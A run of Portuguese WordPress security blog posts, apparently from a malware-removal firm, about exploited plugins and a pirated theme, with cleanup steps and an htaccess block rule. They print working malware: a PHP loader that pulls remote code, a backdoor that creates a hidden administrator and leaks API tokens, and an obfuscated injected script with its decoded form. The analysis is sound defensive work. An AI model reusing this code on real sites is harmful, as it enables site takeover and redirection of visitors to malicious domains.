O problema está no arquivo social-warfare\lib\utilities\SWP_ Databa se_Migration.php, dentro desse arquivo existe uma varável com o nome $_GET[‘swp_url’] com a função get_file_content do php, que permite a execução de códigos remotamente:

A grande falha aqui está na função is_admin() do wordpress que é utilizada incorretamente, que faz somente a checagem se a url solicitada faz parte da página de admin, não fazendo a validação se o administrador está logado.

Fazendo o teste:

Novamente usei o laboratório local para teste, colocando o exploit e payload em outra maquina para comprovar o acesso não autorizado, como o código permite execução de comandos dentro de arquivos, criei um arquivo txt com a função phpinfo(), segue o resultado:

E se eu quiser o nome da base de dados e outras infromações importantes, basta o invasor usar a imaginação (isso eles tem de sobra), baixar conteúdo, visualizar a senha da base de dados e até inserir usuários no banco de dados, criando outro admin para o site.

Não acaba por ai, temos uma vulnerabilidade de XSS de brinde:

Além da falha citada acima, essa brecha abre caminho para inserir conteúdo no banco de dados com técnicas de Cross Site Scripting, assim como mostrei no post do Yuzo Related Posts

Com a mesma url é utilizado um outro exploit e dessa vez podemos inserir conteúdo no banco de dados e redirecionar o site para domínios maliciosos, não vamos detalhar a vulnerabilidade pois seria um copiar e colar do post relacionado ao related posts.

Solução:

Atualize o plugin o mais rápido possível para a versão acima de 3.5.3 .

Site infectado? Não consegue resolver?

Entre em contato agora com nossa consultoria especializada através do link Remoção de Malware em nosso site.

O post Vulnerabilidades sendo exploradas no plugin Social Warfare apareceu primeiro em ETH SECURITY.

Realizamos o download de um tema pirata, fizemos a instalação em em ambiente controlado e após isso fizemos o nosso scan nos arquivos e encontramos códigos maliciosos injetados nos seguintes arquivos:

./wp-content/themes/twentynineteen/functions.php
./wp-content/themes/twentyseventeen/functions.php
./wp-content/themes/twentysixteen/functions.php
./wp-includes/post.php
./wp-includes/wp-tmp.php
./wp-includes/wp-vcd.php

Começamos pelos arquivos functions.php e o conteúdo mostra que o mesmo é utilizado para infectar os demais:

elseif ($tmpcontent = @file_get_contents(“http://www. harors .pw/code .php”) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);

verificando o conteúdo do arquivo wp-tmp.php o mesmo contém redirecionamentos para sites maliciosos:

<script type=”text/javascript” src=”//deloplen .com/ apu.php?zoneid=2542869″ async data-cfasync=”false”></script>
<script src=”//pushqwer .com/ ntfc.php?p=2542872″ data-cfasync=”false” async></script>

Os links acima em seu site fará com que o mesmo seja marcado como malicioso no Google e outras ferramentas de pesquisa, ou seja, o site será marcado com a tela vermelha de alerta de conteúdo malicioso, imagine seu cliente acessando sua loja online e se deparando com o aviso “O site a seguir contém conteúdo malicioso ou enganoso”.

Em outras ocasiões o Google interrompe o AdSense e Adwords para aquele site, outro prejuízo para o proprietário do mesmo.

Analisando mais profundamente os scripts vimos que também foi criado o arquivo wp-includes/class-wp.php:

require $_SERVER[‘DOCUMENT_ROOT’].’/wp-load.php’;
$table_name = $wpdb->get_blog_prefix();
$sample = ‘a:1:{s:13:”administrator”;b:1;}’;
if( isset($_GET[‘ok’]) ) { echo ‘<!– Silence is golden. –>’;}
if( isset($_GET[‘awu’]) ) {
$wpdb->query(“INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (‘100010010’, ‘100010010’, ‘\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.’, ‘100010010’, ‘te@ea.st’, ”, ‘2011-06-07 00:00:00’, ”, ‘0’, ‘100010010’);”);
$wpdb->query(“INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, ‘100010010’, ‘{$table_name}capabilities’, ‘{$sample}’);”);
$wpdb->query(“INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, ‘100010010’, ‘{$table_name}user_level’, ’10’);”); }
if( isset($_GET[‘dwu’]) ) { $wpdb->query(“DELETE FROM $wpdb->users WHERE `ID` = 100010010”);
$wpdb->query(“DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 100010010”);}
if( isset($_GET[‘key’]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo ‘<center><h2>’ . esc_attr( $options[‘user_name’] . ‘:’ . esc_attr( $options[‘api_key’])) . ‘<br>’;
echo esc_html( envato_market()->get_option( ‘token’ ) ); echo ‘</center></h2>’; }

Analisando o código chegamos a conclusão que se trata de um backdoor, veja o que o acontece ao acessar o arquivo pela url utilizando o final ?awu (add wordpress user):

| 100010010 | 100010010 | $P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL. | 100010010 | te@ea.st | | 2011-06-07 00:00:00 | | 0 | 100010010 |

Conforme visto acima, foi adicionado um usuário WordPress com a propriedade de administrador na tabela wp_users no banco de dados, o que dará total controle do invasor ao site, depois de realizar as ações que quiser o usuário pode ser removido com o comando dwu (delete wordpress user) e podendo adicionar novamente quando desejar enquanto o arquivo estiver no site, ou seja, ele toamrá total controle do site sem que você saiba até um analista de segurança apurar os logs e descobrir essas ações ou o arquivo ser removido.

Conclusão:

Baixando plugins e temas piratas você estará inserindo um verdadeiro cavalo de Tróia em seu site, dando acesso a terceiros a todos os dados sensíveis, trazendo muito mais prejuízo do que adquirir um tema ou plugin de maneira lícita.

Além das vantagens de ter um site seguro, adquirindo um plugin ou tema pago de maneira correta você poderá contar com o suporte do desenvolvedor da aplicação em caso de problemas.

Site infectado? Não consegue resolver?

Entre em contato agora com nossa consultoria especializada através do link Remoção de Malware em nosso site.

Dúvidas? Sugestões? Fiquem a vontade para se expressar nos comentários.

O post Por que não utilizar temas e plugins piratas. apareceu primeiro em ETH SECURITY.

Infecção:

Uma vez explorada o invasor insere um código malicioso como da imagem abaixo:

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>

O código descriptografado fica dessa maneira:

</style><script language=javascript>var elem = document.createElement(‘script’);

elem.type = ‘text/javascript’;

elem.async = true; elem.src = ‘hxxps://hellofromhony[.]org/counter’;

document.getElementsByTagName(‘head’)[0].appendChild(elem);</script>

Assim quando o site é acessado o usuário e redirecionado para sites maliciosos.

Removendo a infecção:

Primeiramente faça um backup de sua base de dados, pois caso dê algo errado você terá uma cópia de segurança.

Acesse seu PhpMyAdmin ou o gerenciador de banco de dados de sua preferência e clique na base de dados e em pesquisar, adicione a string “String.fromCharCode(118” ,sem aspas, no campo de pesquisa e clique em selecionar todas as tabelas e cliquem em executar no canto a direita:

Após isso você verá que o conteúdo foi encontrado na tabela wp_options:

Copie todo o conteúdo para um bloco de notas e remova exatamente o conteúdo que foi citado acima e substitua na tabela citada pelo conteúdo sem a infecção.

Contra medida:

Ainda não foi publicada uma atualização para o problema, então a recomendação é de que o plugin seja totalmente removido de sua instalação até que o desenvolvedor publique uma correção:

https://wordpress.org/support/topic/remove-this-plugin-immediately/

Como dito no vídeo criei um htaccess para que você possa se proteger dessa falha caso deseje manter o plugin, porém essa medida serve somente para esse tipo de ataque, pois o invasor pode alterar o modo como realiza a requisição, porém já é o bastante para bloquear o processo automático que ocorre nesse momento na internet:

RewriteEngine on
ErrorDocument 406 “<head><title>Bad Request!</title></head><body><h1>Blocked by Defensor Web!</h1><p>Hacking Attempt!. </p></body></html>”
RewriteEngine On
RewriteCond %{THE_REQUEST} “POST \/wp-admin\/admin-post\.php\?page\=yuzo-related-post HTTP\/1.1” [NC]
RewriteRule .* – [R=406,L]

As aspas podem colar incorretamente em seu htaccess, então disponibilizei o código raw no pastebin:

https://pastebin.com/GKYBv5Qt

Dúvidas e sugestões fiquem a vontade para se expressarem nos comentários.

Site infectado? Não consegue resolver?

Entre em contato agora com nossa consultoria especializada através do link Remoção de Malware em nosso site.

O post [Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção apareceu primeiro em ETH SECURITY.

    Foi publicada essa semana uma vulnerabilidade que vem sendo explorada por hackers a fim de infectar sites WordPress que utilizam o plugin Yellow Pencil. Esse plugin é muito utilizado para personalizar o estilo do sites, como cores e formatos das páginas, porém o mesmo foi removido do repositório do WordPress  devido a falha descoberta.

    Escalonamento de privilégio que permite a alteração na tabela wp_options:

A primeira parte da falha está presente no arquivo yellow-pencil.php, que possui um função que é chamada a cada carregamento de página para verificar se o parâmetro yp_remote_get foi definido, em caso afirmativo o plugin eleva o privilégio para de  um administrador do WordPress  para concluir a solicitação.

    Como essa falha vem sendo explorada:

Como a falha concede acesso para que o conteúdo da tabela wp_options seja alterado, informações sensíveis a segurança estão sendo alteradas, como email do administrador e a URL do site, assim quando o site é acessado o usuário é redirecionado para sites malicioso que tem como objetivo infectar os computadores dos usuários, trazendo assim sérios prejuízos  para a imagem do site na internet e no ranqueamento do Google, o que é um transtorno e tanto para quem deseja ter uma presença online de sucesso.

O que fazer caso seu site utilize este plugin:

Caso você utilize esse plugin há grandes chances de sei site estar infectado, em caso afirmativo você pode utilizar o sitecheck do portal Sucuri para detectar a url maliciosa, porém recomendamos que esse plugin seja removido de sua instalação até que uma atualização de segurança seja disponibilizada.

Caso mesmo assim você precise utilizar esse plugin em seu site e não posso substituí-lo ou removê-lo recomendamos que utilize o firewall do Wordfence na versão premium, que já possui uma proteção para essa exploração.

 Update!

O plugin Yellow Pencil publicou na data de hoje uma atualização para a falha relatada neste post, fizemos os devidos testes com a nova versão conforme o link para atualização:

https://yellowpencil.waspthemes.com/docs/important-security-update/

Com base nos testes a falha foi devidamente fechada, então caso você possua esse plugin em seu WordPress realize o update imediatamente.

E aí? o que acharam? fiquem a vontade para se expressar nos comentários, também podem realizar perguntas que nossa equipe terá prazer em respondê-las.

Site infectado? Não consegue resolver?

Entre em contato agora com nossa consultoria especializada através do link Remoção de Malware em nosso site.

O post Vulnerabilidade sendo explorada no plugin Yellow Pencil do WordPress, atualização já disponível. apareceu primeiro em ETH SECURITY.